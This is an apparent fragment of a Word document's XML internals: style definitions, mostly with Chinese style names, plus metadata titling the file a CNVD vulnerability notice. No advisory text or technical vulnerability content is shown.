    <w:basedOn w:val="a7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans CJK SC"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden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paragraph" w:styleId="af">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="af0">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="59"/>
    <w:qFormat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uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Lucida Console" w:eastAsia="宋体" w:hAnsi="Lucida Console" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Internet">
    <w:name w:val="访问过的 Internet 链接"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Internet0">
    <w:name w:val="Internet 链接"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ad">
    <w:name w:val="页眉 字符"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="页脚 字符"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="宋体" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a9">
    <w:name w:val="批注框文本 字符"/>
    <w:link w:val="a8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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="b1">
    <w:name w:val="b1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FF0000"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m1">
    <w:name w:val="m1"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pi1">
    <w:name w:val="pi1"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t1">
    <w:name w:val="t1"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="990000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ns1">
    <w:name w:val="ns1"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="tx1">
    <w:name w:val="tx1"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTML0">
    <w:name w:val="HTML 预设格式 字符"/>
    <w:link w:val="HTML"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headline-content2">
    <w:name w:val="headline-content2"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="11">
    <w:name w:val="已访问的超链接1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontbig181">
    <w:name w:val="font_big181"/>
    <w:qFormat/>
    <w:rPr>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-style-span">
    <w:name w:val="apple-style-span"/>
    <w:basedOn w:val="a1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="文档结构图 字符"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="subtitle">
    <w:name w:val="sub_title"/>
    <w:basedOn w:val="a1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12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1">
    <w:name w:val="未处理的提及2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13">
    <w:name w:val="明显参考1"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="4472C4" w:themeColor="accent1"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3">
    <w:name w:val="未处理的提及3"/>
    <w:basedOn w:val="a1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af2">
    <w:name w:val="标题样式"/>
    <w:basedOn w:val="a0"/>
    <w:next w:val="a7"/>
    <w:qFormat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customStyle="1" w:styleId="af3">
    <w:name w:val="索引"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Noto Sans CJK SC"/>
      <w:lang w:val="zh-CN" w:bidi="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af4">
    <w:name w:val="页眉与页脚"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af5">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="110">
    <w:name w:val="无格式表格 11"/>
    <w:basedOn w:val="a2"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi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tcMar>
        <w:top w:w="113" w:type="dxa"/>
        <w:bottom w:w="113" w:type="dxa"/>
      </w:tcMar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FFFFFF" w:themeColor="background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3</Pages>
  <Words>67</Words>
  <Characters>387</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>eversec</Company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国家信息安全漏洞共享平台(CNVD)漏洞通报</dc:title>
  <dc:subject/>
  <dc:creator>lenovo</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>重阳 李</cp:lastModifiedBy>
  <cp:revision>875</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-05T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T01:26:00Z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5BB5D568E13E498097D175A2EB448372</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-5.1.1.7662</vt:lpwstr>
  </property>
</Properties>
</file>